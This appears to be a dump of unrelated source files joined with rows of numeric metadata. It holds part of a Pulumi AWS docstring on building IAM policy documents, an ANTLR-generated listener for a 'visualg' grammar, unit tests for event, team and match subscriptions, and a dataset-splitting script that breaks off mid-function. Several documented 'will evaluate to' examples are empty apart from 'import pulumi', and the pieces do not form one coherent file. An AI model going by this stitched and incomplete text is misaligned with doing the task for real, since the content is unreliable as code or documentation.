Generates an IAM policy document in JSON format for use with resources that expect policy documents such as `iam.Policy`.
Using this data source to generate policy documents is *optional*. It is also valid to use literal JSON strings in your configuration or to use the `file` interpolation function to read a raw JSON policy document from a file.
## Example Usage
### Basic Example
```python
import pulumi
import pulumi_aws as aws
example_policy_document = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
sid="1",
actions=[
"s3:ListAllMyBuckets",
"s3:GetBucketLocation",
],
resources=["arn:aws:s3:::*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["s3:ListBucket"],
resources=[f"arn:aws:s3:::{var['s3_bucket_name']}"],
conditions=[aws.iam.GetPolicyDocumentStatementConditionArgs(
test="StringLike",
variable="s3:prefix",
values=[
"",
"home/",
"home/&{aws:username}/",
],
)],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["s3:*"],
resources=[
f"arn:aws:s3:::{var['s3_bucket_name']}/home/&{{aws:username}}",
f"arn:aws:s3:::{var['s3_bucket_name']}/home/&{{aws:username}}/*",
],
),
])
example_policy = aws.iam.Policy("examplePolicy",
path="/",
policy=example_policy_document.json)
```
### Example Assume-Role Policy with Multiple Principals
You can specify multiple principal blocks with different types. You can also use this data source to generate an assume-role policy.
```python
import pulumi
import pulumi_aws as aws
event_stream_bucket_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
principals=[
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="Service",
identifiers=["firehose.amazonaws.com"],
),
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="AWS",
identifiers=[var["trusted_role_arn"]],
),
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="Federated",
identifiers=[
f"arn:aws:iam::{var['account_id']}:saml-provider/{var['provider_name']}",
"cognito-identity.amazonaws.com",
],
),
],
)])
```
### Example Using A Source Document
```python
import pulumi
import pulumi_aws as aws
source = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=["*"],
),
])
source_document_example = aws.iam.get_policy_document(source_policy_documents=[source.json],
statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=[
"arn:aws:s3:::somebucket",
"arn:aws:s3:::somebucket/*",
],
)])
```
`data.aws_iam_policy_document.source_document_example.json` will evaluate to:
```python
import pulumi
```
### Example Using An Override Document
```python
import pulumi
import pulumi_aws as aws
override = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=["*"],
)])
override_policy_document_example = aws.iam.get_policy_document(override_policy_documents=[override.json],
statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=[
"arn:aws:s3:::somebucket",
"arn:aws:s3:::somebucket/*",
],
),
])
```
`data.aws_iam_policy_document.override_policy_document_example.json` will evaluate to:
```python
import pulumi
```
### Example with Both Source and Override Documents
You can also combine `source_policy_documents` and `override_policy_documents` in the same document.
```python
import pulumi
import pulumi_aws as aws
source = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceholder",
actions=["ec2:DescribeAccountAttributes"],
resources=["*"],
)])
override = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceholder",
actions=["s3:GetObject"],
resources=["*"],
)])
politik = aws.iam.get_policy_document(source_policy_documents=[source.json],
override_policy_documents=[override.json])
```
`data.aws_iam_policy_document.politik.json` will evaluate to:
```python
import pulumi
```
### Example of Merging Source Documents
Multiple documents can be combined using the `source_policy_documents` or `override_policy_documents` attributes. `source_policy_documents` requires that all documents have unique Sids, while `override_policy_documents` will iteratively override matching Sids.
```python
import pulumi
import pulumi_aws as aws
source_one = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="UniqueSidOne",
actions=["s3:*"],
resources=["*"],
),
])
source_two = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
sid="UniqueSidTwo",
actions=["iam:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["lambda:*"],
resources=["*"],
),
])
combined = aws.iam.get_policy_document(source_policy_documents=[
source_one.json,
source_two.json,
])
```
`data.aws_iam_policy_document.combined.json` will evaluate to:
```python
import pulumi
```
### Example of Merging Override Documents
```python
import pulumi
import pulumi_aws as aws
policy_one = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderOne",
effect="Allow",
actions=["s3:*"],
resources=["*"],
)])
policy_two = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
effect="Allow",
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderTwo",
effect="Allow",
actions=["iam:*"],
resources=["*"],
),
])
policy_three = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderOne",
effect="Deny",
actions=["logs:*"],
resources=["*"],
)])
combined = aws.iam.get_policy_document(override_policy_documents=[
policy_one.json,
policy_two.json,
policy_three.json,
],
statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderTwo",
effect="Deny",
actions=["*"],
resources=["*"],
)])
```
`data.aws_iam_policy_document.combined.json` will evaluate to:
```python
import pulumi
```
:param str override_json: - IAM policy document whose statements with non-blank `sid`s will override statements with the same `sid` from documents assigned to the `source_json`, `source_policy_documents`, and `override_policy_documents` arguments. Non-overriding statements will be added to the exported document.
:param Sequence[str] override_policy_documents: List of IAM policy documents that are merged together into the exported document. In merging, statements with non-blank `sid`s will override statements with the same `sid` from earlier documents in the list. Statements with non-blank `sid`s will also override statements with the same `sid` from documents provided in the `source_json` and `source_policy_documents` arguments. Non-overriding statements will be added to the exported document.
:param str policy_id: ID for the policy document.
:param str source_json: - IAM policy document used as a base for the exported policy document. Statements with the same `sid` from documents assigned to the `override_json` and `override_policy_documents` arguments will override source statements.
:param Sequence[str] source_policy_documents: List of IAM policy documents that are merged together into the exported document. Statements defined in `source_policy_documents` or `source_json` must have unique `sid`s. Statements with the same `sid` from documents assigned to the `override_json` and `override_policy_documents` arguments will override source statements.
:param Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']] statements: Configuration block for a policy statement. Detailed below.
:param str version: IAM policy document version. Valid values are `2008-10-17` and `2012-10-17`. Defaults to `2012-10-17`. For more information, see the [AWS IAM User Guide](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_version.html).
"""
...
| 39.718706
| 495
| 0.63704
| 2,898
| 28,240
| 6.015528
| 0.096273
| 0.034073
| 0.086732
| 0.027534
| 0.848678
| 0.818849
| 0.797855
| 0.757873
| 0.736419
| 0.721046
| 0
| 0.005086
| 0.255064
| 28,240
| 710
| 496
| 39.774648
| 0.823597
| 0.669405
| 0
| 0.092857
| 1
| 0
| 0.174651
| 0.077622
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092857
| false
| 0
| 0.05
| 0.05
| 0.235714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b286ca068eceee4e35c744914d9e13ecac7852e
| 10,868
|
py
|
Python
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2021-01-17T19:17:06.000Z
|
2021-01-17T19:17:06.000Z
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2021-01-14T13:45:37.000Z
|
2021-06-10T14:55:08.000Z
|
visualgListener.py
|
VictorCampelo/Compiler_VisualG
|
f06b0ce5ea8033c04092dc92062c253ace2eef83
|
[
"MIT"
] | 1
|
2020-12-23T22:00:42.000Z
|
2020-12-23T22:00:42.000Z
|
# Generated from visualg.g4 by ANTLR 4.9.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .visualgParser import visualgParser
else:
from visualgParser import visualgParser
# This class defines a complete listener for a parse tree produced by visualgParser.
class visualgListener(ParseTreeListener):
# Enter a parse tree produced by visualgParser#prog.
def enterProg(self, ctx:visualgParser.ProgContext):
pass
# Exit a parse tree produced by visualgParser#prog.
def exitProg(self, ctx:visualgParser.ProgContext):
pass
# Enter a parse tree produced by visualgParser#variaveis_globais.
def enterVariaveis_globais(self, ctx:visualgParser.Variaveis_globaisContext):
pass
# Exit a parse tree produced by visualgParser#variaveis_globais.
def exitVariaveis_globais(self, ctx:visualgParser.Variaveis_globaisContext):
pass
# Enter a parse tree produced by visualgParser#variaveis_locais.
def enterVariaveis_locais(self, ctx:visualgParser.Variaveis_locaisContext):
pass
# Exit a parse tree produced by visualgParser#variaveis_locais.
def exitVariaveis_locais(self, ctx:visualgParser.Variaveis_locaisContext):
pass
# Enter a parse tree produced by visualgParser#funcoes.
def enterFuncoes(self, ctx:visualgParser.FuncoesContext):
pass
# Exit a parse tree produced by visualgParser#funcoes.
def exitFuncoes(self, ctx:visualgParser.FuncoesContext):
pass
# Enter a parse tree produced by visualgParser#parametros.
def enterParametros(self, ctx:visualgParser.ParametrosContext):
pass
# Exit a parse tree produced by visualgParser#parametros.
def exitParametros(self, ctx:visualgParser.ParametrosContext):
pass
# Enter a parse tree produced by visualgParser#expressoes.
def enterExpressoes(self, ctx:visualgParser.ExpressoesContext):
pass
# Exit a parse tree produced by visualgParser#expressoes.
def exitExpressoes(self, ctx:visualgParser.ExpressoesContext):
pass
# Enter a parse tree produced by visualgParser#chamar_funcao.
def enterChamar_funcao(self, ctx:visualgParser.Chamar_funcaoContext):
pass
# Exit a parse tree produced by visualgParser#chamar_funcao.
def exitChamar_funcao(self, ctx:visualgParser.Chamar_funcaoContext):
pass
# Enter a parse tree produced by visualgParser#constCaractere.
def enterConstCaractere(self, ctx:visualgParser.ConstCaractereContext):
pass
# Exit a parse tree produced by visualgParser#constCaractere.
def exitConstCaractere(self, ctx:visualgParser.ConstCaractereContext):
pass
# Enter a parse tree produced by visualgParser#constNumerico.
def enterConstNumerico(self, ctx:visualgParser.ConstNumericoContext):
pass
# Exit a parse tree produced by visualgParser#constNumerico.
def exitConstNumerico(self, ctx:visualgParser.ConstNumericoContext):
pass
# Enter a parse tree produced by visualgParser#constBool.
def enterConstBool(self, ctx:visualgParser.ConstBoolContext):
pass
# Exit a parse tree produced by visualgParser#constBool.
def exitConstBool(self, ctx:visualgParser.ConstBoolContext):
pass
# Enter a parse tree produced by visualgParser#constVet.
def enterConstVet(self, ctx:visualgParser.ConstVetContext):
pass
# Exit a parse tree produced by visualgParser#constVet.
def exitConstVet(self, ctx:visualgParser.ConstVetContext):
pass
# Enter a parse tree produced by visualgParser#escreva.
def enterEscreva(self, ctx:visualgParser.EscrevaContext):
pass
# Exit a parse tree produced by visualgParser#escreva.
def exitEscreva(self, ctx:visualgParser.EscrevaContext):
pass
# Enter a parse tree produced by visualgParser#leia.
def enterLeia(self, ctx:visualgParser.LeiaContext):
pass
# Exit a parse tree produced by visualgParser#leia.
def exitLeia(self, ctx:visualgParser.LeiaContext):
pass
# Enter a parse tree produced by visualgParser#desvio_condicional.
def enterDesvio_condicional(self, ctx:visualgParser.Desvio_condicionalContext):
pass
# Exit a parse tree produced by visualgParser#desvio_condicional.
def exitDesvio_condicional(self, ctx:visualgParser.Desvio_condicionalContext):
pass
# Enter a parse tree produced by visualgParser#selecao_multipla.
def enterSelecao_multipla(self, ctx:visualgParser.Selecao_multiplaContext):
pass
# Exit a parse tree produced by visualgParser#selecao_multipla.
def exitSelecao_multipla(self, ctx:visualgParser.Selecao_multiplaContext):
pass
# Enter a parse tree produced by visualgParser#para_faca.
def enterPara_faca(self, ctx:visualgParser.Para_facaContext):
pass
# Exit a parse tree produced by visualgParser#para_faca.
def exitPara_faca(self, ctx:visualgParser.Para_facaContext):
pass
# Enter a parse tree produced by visualgParser#enquanto_faca.
def enterEnquanto_faca(self, ctx:visualgParser.Enquanto_facaContext):
pass
# Exit a parse tree produced by visualgParser#enquanto_faca.
def exitEnquanto_faca(self, ctx:visualgParser.Enquanto_facaContext):
pass
# Enter a parse tree produced by visualgParser#repita_ate.
def enterRepita_ate(self, ctx:visualgParser.Repita_ateContext):
pass
# Exit a parse tree produced by visualgParser#repita_ate.
def exitRepita_ate(self, ctx:visualgParser.Repita_ateContext):
pass
# Enter a parse tree produced by visualgParser#aleatorio.
def enterAleatorio(self, ctx:visualgParser.AleatorioContext):
pass
# Exit a parse tree produced by visualgParser#aleatorio.
def exitAleatorio(self, ctx:visualgParser.AleatorioContext):
pass
# Enter a parse tree produced by visualgParser#arquivo.
def enterArquivo(self, ctx:visualgParser.ArquivoContext):
pass
# Exit a parse tree produced by visualgParser#arquivo.
def exitArquivo(self, ctx:visualgParser.ArquivoContext):
pass
# Enter a parse tree produced by visualgParser#timer.
def enterTimer(self, ctx:visualgParser.TimerContext):
pass
# Exit a parse tree produced by visualgParser#timer.
def exitTimer(self, ctx:visualgParser.TimerContext):
pass
# Enter a parse tree produced by visualgParser#lista_de_variaveis.
def enterLista_de_variaveis(self, ctx:visualgParser.Lista_de_variaveisContext):
pass
# Exit a parse tree produced by visualgParser#lista_de_variaveis.
def exitLista_de_variaveis(self, ctx:visualgParser.Lista_de_variaveisContext):
pass
# Enter a parse tree produced by visualgParser#lista_numeros.
def enterLista_numeros(self, ctx:visualgParser.Lista_numerosContext):
pass
# Exit a parse tree produced by visualgParser#lista_numeros.
def exitLista_numeros(self, ctx:visualgParser.Lista_numerosContext):
pass
# Enter a parse tree produced by visualgParser#lista_de_intervalo.
def enterLista_de_intervalo(self, ctx:visualgParser.Lista_de_intervaloContext):
pass
# Exit a parse tree produced by visualgParser#lista_de_intervalo.
def exitLista_de_intervalo(self, ctx:visualgParser.Lista_de_intervaloContext):
pass
# Enter a parse tree produced by visualgParser#tipo_da_variavel.
def enterTipo_da_variavel(self, ctx:visualgParser.Tipo_da_variavelContext):
pass
# Exit a parse tree produced by visualgParser#tipo_da_variavel.
def exitTipo_da_variavel(self, ctx:visualgParser.Tipo_da_variavelContext):
pass
# Enter a parse tree produced by visualgParser#tipo_vetor.
def enterTipo_vetor(self, ctx:visualgParser.Tipo_vetorContext):
pass
# Exit a parse tree produced by visualgParser#tipo_vetor.
def exitTipo_vetor(self, ctx:visualgParser.Tipo_vetorContext):
pass
# Enter a parse tree produced by visualgParser#intervalo.
def enterIntervalo(self, ctx:visualgParser.IntervaloContext):
pass
# Exit a parse tree produced by visualgParser#intervalo.
def exitIntervalo(self, ctx:visualgParser.IntervaloContext):
pass
# Enter a parse tree produced by visualgParser#print_variavel.
def enterPrint_variavel(self, ctx:visualgParser.Print_variavelContext):
pass
# Exit a parse tree produced by visualgParser#print_variavel.
def exitPrint_variavel(self, ctx:visualgParser.Print_variavelContext):
pass
# Enter a parse tree produced by visualgParser#calculo.
def enterCalculo(self, ctx:visualgParser.CalculoContext):
pass
# Exit a parse tree produced by visualgParser#calculo.
def exitCalculo(self, ctx:visualgParser.CalculoContext):
pass
# Enter a parse tree produced by visualgParser#expressao_aritmetica.
def enterExpressao_aritmetica(self, ctx:visualgParser.Expressao_aritmeticaContext):
pass
# Exit a parse tree produced by visualgParser#expressao_aritmetica.
def exitExpressao_aritmetica(self, ctx:visualgParser.Expressao_aritmeticaContext):
pass
# Enter a parse tree produced by visualgParser#expressao_logica.
def enterExpressao_logica(self, ctx:visualgParser.Expressao_logicaContext):
pass
# Exit a parse tree produced by visualgParser#expressao_logica.
def exitExpressao_logica(self, ctx:visualgParser.Expressao_logicaContext):
pass
# Enter a parse tree produced by visualgParser#selecao_aritmetica.
def enterSelecao_aritmetica(self, ctx:visualgParser.Selecao_aritmeticaContext):
pass
# Exit a parse tree produced by visualgParser#selecao_aritmetica.
def exitSelecao_aritmetica(self, ctx:visualgParser.Selecao_aritmeticaContext):
pass
# Enter a parse tree produced by visualgParser#selecao_logica.
def enterSelecao_logica(self, ctx:visualgParser.Selecao_logicaContext):
pass
# Exit a parse tree produced by visualgParser#selecao_logica.
def exitSelecao_logica(self, ctx:visualgParser.Selecao_logicaContext):
pass
# Enter a parse tree produced by visualgParser#selecao_escolha.
def enterSelecao_escolha(self, ctx:visualgParser.Selecao_escolhaContext):
pass
# Exit a parse tree produced by visualgParser#selecao_escolha.
def exitSelecao_escolha(self, ctx:visualgParser.Selecao_escolhaContext):
pass
# Enter a parse tree produced by visualgParser#incremento.
def enterIncremento(self, ctx:visualgParser.IncrementoContext):
pass
# Exit a parse tree produced by visualgParser#incremento.
def exitIncremento(self, ctx:visualgParser.IncrementoContext):
pass
del visualgParser
| 33.235474
| 87
| 0.745307
| 1,229
| 10,868
| 6.47681
| 0.134255
| 0.053518
| 0.089196
| 0.160553
| 0.866583
| 0.728141
| 0.723995
| 0.557789
| 0.350628
| 0.058543
| 0
| 0.000572
| 0.195252
| 10,868
| 327
| 88
| 33.235474
| 0.909559
| 0.381119
| 0
| 0.47619
| 1
| 0
| 0.000152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.47619
| false
| 0.47619
| 0.020408
| 0
| 0.503401
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
8cc251eae9758bb9e77bc9cd4d1a03aed219a327
| 9,623
|
py
|
Python
|
tests/models_tests/test_subscription.py
|
tervay/the-blue-alliance
|
e14c15cb04b455f90a2fcfdf4c1cdbf8454e17f8
|
[
"MIT"
] | 1
|
2016-03-19T20:29:35.000Z
|
2016-03-19T20:29:35.000Z
|
tests/models_tests/test_subscription.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | 11
|
2020-10-10T03:05:29.000Z
|
2022-02-27T09:57:22.000Z
|
tests/models_tests/test_subscription.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | null | null | null |
import unittest2
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.model_type import ModelType
from consts.notification_type import NotificationType
from models.account import Account
from models.event import Event
from models.match import Match
from models.team import Team
from models.subscription import Subscription
class TestSubscription(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
ndb.get_context().clear_cache() # Prevent data from leaking between tests
self.event = Event(
id='2020miket',
event_short='miket',
year=2020
)
self.team = Team(
id='frc7332',
team_number=7332
)
self.match = Match(
id='2020miket_qm1',
event=self.event.key,
comp_level='qm',
set_number=1,
match_number=1
)
def tearDown(self):
self.testbed.deactivate()
def test_users_subscribed_to_event_year(self):
# Make sure we match year*
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_key(self):
# Make sure we match an event key
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020mike2',
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_year_key(self):
# Make sure we fetch both key and year together
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])
def test_users_subscribed_to_event_model_type(self):
# Make sure we filter for model types
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_unique(self):
# Make sure we filter for duplicates
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_team_key(self):
# Make sure we match a team key
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])
def test_users_subscribed_to_team_model_type(self):
# Make sure we filter for model types
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_2'])
def test_users_subscribed_to_team_unique(self):
# Make sure we filter for duplicates
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_match_key(self):
# Make sure we match a match key
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket_qm1',
model_type=ModelType.MATCH,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020miket_qm1',
model_type=ModelType.MATCH,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])
def test_users_subscribed_to_match_model_type(self):
# Make sure we filter for model types
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket_qm1',
model_type=ModelType.MATCH,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020miket_qm1',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1'])
def test_users_subscribed_to_match_unique(self):
# Make sure we filter for duplicates
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket_qm1',
model_type=ModelType.MATCH,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket_qm1',
model_type=ModelType.MATCH,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
| 37.589844
| 99
| 0.627039
| 1,070
| 9,623
| 5.31215
| 0.080374
| 0.084448
| 0.046798
| 0.092892
| 0.874384
| 0.858198
| 0.851865
| 0.837262
| 0.837262
| 0.82741
| 0
| 0.025707
| 0.276421
| 9,623
| 255
| 100
| 37.737255
| 0.790608
| 0.04323
| 0
| 0.783784
| 0
| 0
| 0.081792
| 0
| 0
| 0
| 0
| 0
| 0.04955
| 1
| 0.058559
| false
| 0
| 0.045045
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cf8f9a9e98dfe2a32bdba1b79bfa8a0067e96ee
| 12,709
|
py
|
Python
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 22
|
2018-04-27T21:28:46.000Z
|
2021-12-24T06:44:55.000Z
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 81
|
2017-11-09T17:23:15.000Z
|
2020-01-28T22:54:13.000Z
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 18
|
2017-11-13T16:12:17.000Z
|
2020-08-27T10:17:34.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 02 15:59:36 2017
@author: Sebastian Milde
"""
import math
import numpy as np
import h5py
from sklearn.model_selection import KFold
import os
def fSplitDataset(resultFolder, proband_list, model_list, allPatches, allY, sSplitting, patchSize, patchOverlap, split_ratio):
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (2, 0, 1))
if sSplitting == "normal_rand":
nPatches = allPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num_test = rand_num[0:int(dVal)].astype(int)
rand_num_train = rand_num[int(dVal):nPatches].astype(int)
X_test = allPatches[rand_num_test, :, :]
y_test = allY[rand_num_test]
X_train = allPatches
X_train = np.delete(X_train, rand_num_test, axis=0)
y_train = allY
y_train = np.delete(y_train, rand_num_test)
folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
Path = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1]) + '/Becken10_normal_data' + str(patchSize[0]) + str(patchSize[1]) +'.h5'
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('test_index', data=rand_num_test)
hf.create_dataset('train_index', data=rand_num_train)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "normal":
nPatches = allPatches.shape[0]
print(allPatches.shape)
dVal = 18720#math.floor(split_ratio * nPatches)
num_ind = np.arange(nPatches)
num_ind_test = num_ind[0:int(dVal)].astype(int)
num_ind_train = num_ind[int(dVal):nPatches].astype(int)
X_test = allPatches[num_ind_test, :, :]
y_test = allY[num_ind_test]
X_train = allPatches
X_train = np.delete(X_train, num_ind_test, axis=0)
y_train = allY
y_train = np.delete(y_train, num_ind_test)
